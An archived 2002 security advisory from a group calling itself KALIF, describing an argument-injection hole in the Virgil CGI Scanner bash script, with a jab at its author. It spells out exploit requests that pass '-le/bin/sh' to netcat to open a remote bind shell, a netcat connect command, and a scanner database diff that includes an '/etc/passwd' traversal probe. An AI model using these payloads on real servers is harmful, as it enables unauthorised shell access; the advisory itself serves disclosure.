virgil.txt

2002-10-25T00:00:00
ID PACKETSTORM:29938
Type packetstorm
Reporter KALIF research group
Modified 2002-10-25T00:00:00

Description

                                        
                                            `  
-----BEGIN PGP SIGNED MESSAGE-----  
  
- - --------------------------------------------------------------------------  
KALIF research group kalif@hushmail.com  
October 21st, 2002 Joschka Fischer  
- - --------------------------------------------------------------------------  
  
- - Overview  
  
Software : Virgil CGI Scanner 0.9  
Programmer : Marc Ruef <marc.ruef@computec.ch>  
Vulnerability : Privilege Escalation  
Status : Author has been notified  
Type : remote  
  
- - Issue  
  
Joschka Fischer discovered a security hole in the CGI vulnerability scanner  
'Virgil' by Mark Ruef [1] ! By sending a special crafted request one is able  
to spawn a remote shell with the privileges of the running CGI script.  
  
Depending on the used software this is either the owner of the script (suExec)  
or the user under which the HTTP daemon is executed (usually nobody).  
  
- - Problem Description  
  
Virgil CGI Scanner by Mark Ruef is a simple Bash Script which offers an  
interface to start CGI security audits against foreign hosts. The author states  
that his software represents the first free online-based CGI scanner and uses a  
very effective and fast technique to determine vulnerabilities.  
  
Mark Ruef - a self-proclaimed security expert - recently received fame by posting  
different announcements to well-known security mailinglists and by writing a  
german book called "Hacking Intern" which deals with common security techniques and  
has been released by a german gossip publisher house [2].  
  
To get the Virgil CGI Scanner look at:  
http://www.computec.ch/software/webserver/virgil_cgi_scanner/virgil-0.9.tar.gz  
MD5SUM: fe098b68c0de04cb0200f2db324ab10b  
  
For a running version visit:  
http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi  
  
- - Technical Description  
  
The following vulnerability is present in Virgil CGI Scanner v. 0.9!  
  
BANNER=`echo -e "HEAD / HTTP/1.0\n\n" |nc -w 10 $TARGET $ZIELPORT`  
  
Here, both variables are user-supplied:  
  
TARGET=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $1}' |sed s/"tar="//`  
ZIELPORT=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $2}' |sed s/"zielport="// |sed "s/-//g"`  
  
Nevertheless there exist a few restrictions, namly:  
- The $QUERY_STRING was not parsed, i.e. %20 for example was not replaced with ' '  
- In $ZIELPORT the dash ('-') is filtered out  
  
To test whether the script is vulnerable use the following request and telnet to  
the given port number (i.e. 31337):  
  
/cgi-bin/virgil.cgi?tar=-lp&zielport=31337  
  
Exploitation is very straight forwared as long as nc supports the -e command:  
  
'/cgi-bin/virgil.cgi?tar=-le/bin/sh' spawns a remote shell on a port for  
exactly 10 seconds ("-w 10")! To connect to this shell execute `nc -v TARGET.COM 1030-6000`  
while constantly requesting the URI mentioned above.  
  
- - Workaround / Patch  
  
We are currently not aware of any patches, but we suggest you to update your Virgil  
Vulnerable CGI-Script Database accordingly.  
  
*** apache.db.old Sun Oct 23 23:05:05 1983  
--- apache.db Sun Oct 23 23:05:05 1985  
***************  
*** 1,3 ****  
--- 1,5 ----  
+ cgi-bin/virgil.cgi?tar=-lp&zielport=31337  
+ cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337  
cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd  
  
- - References / Greets  
  
[1] http://www.computec.ch  
[2] http://www.amazon.de/exec/obidos/ASIN/381582284X  
  
Pengo for elite VMS security  
Nung at the CCC-Congress, next time i will ask for coffee.  
  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: Hush 2.2 (Java)  
Note: This signature can be verified at https://www.hushtools.com/verify  
  
wloEARECABoFAj21nuYTHGthbGlmQGh1c2htYWlsLmNvbQAKCRBfQx1m9p9BTXGvAJwL  
bceg643rTUH1HXtJFbvmNqAd7gCgsKHGY9J6tFCj/DeB7RYEmrix0q8=  
=nBCM  
-----END PGP SIGNATURE-----  
  
  
  
  
Get your free encrypted email at https://www.hushmail.com  
`